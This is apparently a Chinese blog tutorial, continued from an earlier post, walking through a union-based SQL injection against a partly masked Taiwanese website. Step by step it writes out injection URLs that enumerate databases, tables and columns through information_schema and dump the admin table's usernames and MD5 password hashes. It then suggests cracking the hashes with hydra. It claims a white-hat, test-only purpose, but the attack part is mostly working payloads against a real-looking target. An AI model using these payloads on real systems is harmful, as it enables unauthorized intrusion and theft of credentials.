接上一篇內容:
目錄
寫在前面
作爲一個防禦型白帽黑/客
你一定要知道黑/客的進攻套路
纔能有相應的防禦措施
聲明:只做測試,發現對方的漏洞,並不進行破壞性操作
信息彙總
漏洞彙總:
1、存在SQL注入漏洞2、SQL注入查詢長度爲9個字段,即 union select 1,2,3,4,5,6,7,8,93、網站無錯誤回顯,SQL執行錯誤顯示空白頁面
數據庫信息:
1、數據庫版本:mysql 5.7.312、當前數據庫:jiuyu_jiuyu3、當前登錄用戶:jiuyu@localhost4、注入點: http://www.xxx.com.tw/page.php?id=133 union select 1,2,version(),current_user(),5,6,7,8,9
利用information_schema庫:
在mysql數據庫中
當前登錄用戶下,會有一個information_schema數據庫
這個數據庫裏包含了當前用戶權限下
所有database、table、column、privilege等等的彙總信息
在注入過程中,可以充分利用。
然後我們根據當前獲得的信息,進行進一步的***
1、 數據庫分析
①獲取該用戶權限下,有多少個數據庫
#拼接注入連接http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_schema)),4,5,6,7,8,9 FROM information_schema.tables#通過information_schema數據庫獲取數據庫相關信息
通過注入SQL語句
得到了數據庫的數量 2 個
②下一步獲取這兩個數據庫的名字
#通過使用limit 可以逐條返回表數據http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_schema,4,5,6,7,8,9 FROM information_schema.tableslimit 2
通過添加兩個limit,限定兩條返回值
得到了僅有的兩個數據庫名稱
information_schema 和 jiuyu_jiuyu
information_schema是默認的信息彙總表
所有,有用的就是jiuyu_jiuyu這個庫
2、表結構分析
得到了目標數據庫:jiuyu_jiuyu
下面對該數據庫進行分析
①獲取數據庫多少表
http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_name)),4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'#返回值爲 4個表
②獲取表名稱
#只有4個表,使用limit 逐條獲取表名http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_name,4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'limit 1
依次得到四個表
adminsmallclasswenzhangneirong
emmm 經過認真分析
不難發現
admin表會有一些重要信息
其他的wenzhang、neirong之類的應該是一些新聞信息
下面 我們就對admin表進行數據獲取
3、用戶名密碼獲取
首先,我們要先拿到admin表的表結構,即包含的字段名
#獲取admin表的字段數量http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(1),4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin'#包含四個字段
獲取4個字段的名稱
#獲取admin表字段名稱http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,column_name,4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin' limit 1
通過limit 逐條獲取admin表的字段值 id username password quanxian
獲取登錄名/密碼
是不是有點緊張
用戶名密碼什麼的
#獲取admin表的數據值http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,username,password,5,6,7,8,9 FROM jiuyu_jiuyu.admin
成功獲取用戶名密碼返回值。
當然,密碼是md5加密過的
如果想破解出明文
可以使用之前介紹過的密碼爆破工具hydra進行爆破
Kali***測試工具庫(三)hydra——密碼暴力破解工具
好了,點到爲止
只做安全測試
發現漏洞
不要做違法亂紀的事情哦。